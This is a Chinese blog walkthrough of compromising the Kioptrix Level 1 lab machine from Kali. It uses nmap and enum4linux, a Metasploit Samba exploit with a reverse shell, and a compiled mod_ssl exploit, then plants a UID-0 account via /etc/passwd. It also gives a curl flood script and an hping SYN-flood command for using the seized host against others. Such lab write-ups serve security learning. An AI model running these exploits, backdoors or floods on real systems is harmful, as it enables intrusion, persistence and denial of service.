kali渗透之多种方式获得Kioptrix_Level_1权限

已于 2022-03-10 11:45:38 修改
阅读量506 收藏 3
点赞数 2
分类专栏: kali渗透 文章标签: 服务器 网络 linux 渗透测试
于 2022-03-09 11:29:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56988395/article/details/123373098
版权

目录

攻击机

         靶机

确定IP

扫端口

Samba

提权

mod_ssl

注:以下内容仅供学习交流,请勿用于非法途径

攻击机

kali

靶机

Kioptrix_Level_1

链接: https://pan.baidu.com/s/1mKgDej801fuFzBdD8U7IXA?pwd=4tmr 提取码: 4tmr

确定IP

先扫了一下局域网确定一下IP地址,可以通过过MAC地址来确定1e0e88bb4f737b0abe153baa6619ceb5.png

扫端口

nmap 192.168.1.105 -p- -sV -sS -T4 -A

-p- :扫描全部端口

-sV : 扫描服务版本

-sS : TCP SYN扫描

-T4 : 扫描时序,数字越大,速度越快

-A : 综合扫描

Samba

Samba是在LinuxUNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。(摘自百度百科)

使用SMB协议主要用到139和445端口

扫一下SMB漏洞

1、enum4linux:SMB枚举工具(利用空会话认证,收集靶机信息)

enum4linux 192.168.1.105

发现没有空会话漏洞,所以我们换个思路

  1. 使用searchsploit查询一下SMB服务漏洞

发现一堆

由于我们现在还不知道它使用的版本,所以除了一个个试的最后方法外,我们还可以用到一个工具来扫描它的SMB版本信息,MSF(美少妇)

利用查询版本模块

search smb_version

使用这一模块并进行设置

找到了版本号

所以我们可以使用精准查询

search samba 2.2

我们使用Linux那个的,使用并设置

发现进不去,可能这个靶机版本太老了,我们改一下攻击载荷试试

set payload linux/x86/shell_reverse_tcp

这个是反向shell链接,没有用到MSF攻击载荷模块

这次成功进入

发现我们是root权限

但是我们发现虽然我们是root权限,但是好像很多东西都被限制了

提权

这里用到的方法是添加一个root权限用户,也就是0 0

添加一个用户试试

useradd xiaoming

很不辛的是,我们的权限太低了,连添加账户都做不到,这时候我们又要找一个新的思路,既然我们的权限那么小,那能不能尝试使用那些高权限的用户的

我们可以先用w看看有没有什么用户在线,不过发现没有用户在线

既然如此,我们尝试修改一个其他账户john的密码,毕竟我们是root权限

诶,结果发现还真的可以

我们前面知道它也开了ssh端口,所以我们用xshell进去一下

输入刚刚设置的密码123456

成功进入

但是发现这个账户还是没有权限

没办法,再换一个试试,毕竟这东西本身就是在不断的试错中得到正确答案,这也是渗透的魅力之一

这次我们来个狠的,直接试一下root这个账户

这次发现成功进来了,不过为了隐蔽性我们创建一个暂时是普通用户的用户,xiaoming

好了,现在我们正式进行提权

进入vim /etc/passwd修改成00即可

我们登录一下看看,成功进入,而且没有权限限制

进来后我们可以利用这台肉鸡进行肉鸡流量污染,当然了这里不能讲,我们这里做个小测试就行。

这里我们使用我们的kali作为靶机

kali查看一下流量

watch -n 1 "sar -n DEV 1 2"

IFACE: LAN接口

rxpck/s : 每秒中接收的数据包

txpck/s : 每秒中发送的数据包

rxbyt/s : 每秒中接收的字节数

txbyt/s : 每秒中发送的字节数

可以写个脚本

for ((i=1;i<=$1;i++));

do

curl http://192.168.1.106

done

运行一下

sh wr.sh 1000000

发现kali这边瞬间就起飞了,不过由于虚拟机是无限带宽的,所以感觉不是很明显

或者我们可以用来利用洪水攻击

hping -c 100000 -n -i u1 -S -d 2000000 192.168.1.106

具体效果就不在这里演示了

mod_ssl

渗透的方式有很多种,除了刚刚说的samba,我们也可以利用这个漏洞看看能不能进去

搜一下相关漏洞

serachsploit mod_ssl

这里有好几个,我们可以一个一个地试一试,不过我们这里为了节省时间,我们直接使用这个试过后可行的

searchsploit -m 47080.c

编译一下这个漏洞文件

gcc -o mod_ssl_exp 47080.c -lcrypto

查看漏洞帮助

./mod_ssl_exp -h

这里需要指定target,之前我们发现是redhat机器,所以在target中选择redhat即可,挨个尝试可找到0x6b时可反弹shell

./mod_ssl_exp 0x6b 192.168.1.105 443 -c 50

进入后的提权操作可以自行尝试

当然了, 除了这里两种,或许我们也可以通过他的80端口进行渗透,这些就需要大家自行尝试了。

翎~翊
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CFIX(Samba)服务的使用
心飞扬Q
11-18 798
Samba是在Linux和UNIX系统上实现SMB协议的一个免费软件,由服务器及客户端程序构成。SMB(Server Messages Block,信息服务块)是一种在局域网上共享文件和打印机的一种通信协议,它为局域网内的不同计算机之间提供文件及打印机等资源的共享服务。SMB协议是客户机/服务器型协议,客户机通过该协议可以访问服务器上的共享文件系统、打印机及其他资源。通过设置“NetBIOS over TCP/IP”使得Samba不但能与局域网络主机分享资源,还能与全世界的电脑分享资源。( ---来...
ubuntu下安装samba
weixin_34050389的博客
01-09 85
安装samba sudo apt-get install samba sudo apt-get install samfs [编辑] Kubuntu 安装系统设置的共享模块 sudo apt-get install kdenetwork-filesharing [编辑] 配置 1.windows 访问 ubuntu 第一步创建共享目录: 比...
【从服务器获取共享列表失败】【无法与设备或资源通信】解决方案!
Perfect886的博客
12-19 1588
【从服务器获取共享列表失败】【无法与设备或资源通信】问题解决方案!
Linux安装samba】
sinat_23896491的博客
10-12 1644
samba服务器搭建
Linux系统安装Samba服务器
踏雨歌青春,诗酒趁年华
01-21 2717
本篇文章将介绍如何在Linux系统上安装Samba服务,以CentOS7系统为例。在实际开发中,我们经常会有跨系统之间文件传递的需求,Samba便是能够在Windows和Linux之间传递文件的服务,功能也是非常强大和好用。
Kali Linux高级渗透测试 _2016.05_罗伯特_KaliLinux高级渗透测试_渗透_完整版_
09-29
P226
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试
KALI_LINUX_AN_ETHICAL_HACKERS_COOKBOOK.pdf
09-25
KALI_LINUX_AN_ETHICAL_HACKERS_COOKBOOK.pdf
1,枚举服务.rar_kali linux
09-21
扫描端口,很详细。个人珍藏版。好好领悟其中奥秘吧。加油
Linux安装samba服务
热门推荐
孤夜的博客
04-11 1万+
一:使用到的Linux指令 1:检查是否安装samba了服务 rpm -qa |grep samba 2:安装samba服务 mkdir /iso 建立子目录 mount /dev/cdrom /iso 挂载光盘 vim /etc/yum.repos.d/dvd.repo 配置yum源 [dvd] name=dvd baseurl=file:///iso gpgcheck.........
Linux安装samba
Ooo0oops
10-27 1191
Samba服务在Ubuntu服务器版本中默认并没有安装。 1. Samba软件包的安装 使用源安装,在终端中输入如下命令: #sudo   apt-get   update #sudo   apt-get   install  samba   samba-common #sudo   apt-get   install   samba #sudo   apt-get   insta
linux安装Samba
阳光码术-Java面试宝典
11-04 368
etc/init.d/smb start或service smb start(设置为开机自动启动chkconfig smb on)security = user(并通过smbpasswd -a root设置user密码,可设置为电脑登录密码)setenforce 0(默认,SELinux禁止网络上对Samba服务器上的共享文件进读写操作)/etc/init.d/smb stop或service smb stop。注意打开[public]的所有配置,删除前面的;
linux中samba服务安装
一个买啥啥降价的韭菜
06-02 893
linux中samba服务安装过程记录笔记
Linux Samba安装
情不醉、信仰
07-31 292
安装 apt-get install samba 创建共享目录,并修改共享文件夹的权限: mkdir /home/user/share chmod 777 /home/user/share 添加用户并设置samba访问密码: smbpasswd -a username 修改配置文件 /etc/samba/smb.conf: cd /etc/samba/ mv smb.conf ./smb.conf.bak vim smb.conf smb.conf 中添加如下内容: [global] netbios
Linux系统samba安装
qq_44521335的博客
06-19 3779
linux samba
Linux中安装与配置samba服务器
最新发布
2301_81920872的博客
06-17 919
Samba是一款在Linux系统中广泛使用的开源软件,它允许Linux与Windows系统之间进行文件共享和打印服务。通过配置Samba服务器,我们可以轻松地在Linux和Windows之间实现文件传输和共享,提高工作效率。本文将详细介绍如何在Linux中安装与配置samba服务器,帮助读者快速掌握Samba的基本使用方法。本文介绍了在Linux中配置和管理Samba服务器的基本步骤。
linux安装samba服务器
daa20的专栏
03-22 477
需求:在windonw下,查看kernel代码,部分文件重名被删掉,因此需要在window上通过samba查看linux的kernel源码。 当前系统环境: [root@cli-1 ~] # uname -a Linux cli-1 3.15.0 #1 SMP Sat Mar 21 16:57:22 CST 2020 x86_64 x86_64 x86_64 GNU/Linux 查看是否已安装sa...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

翎~翊

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值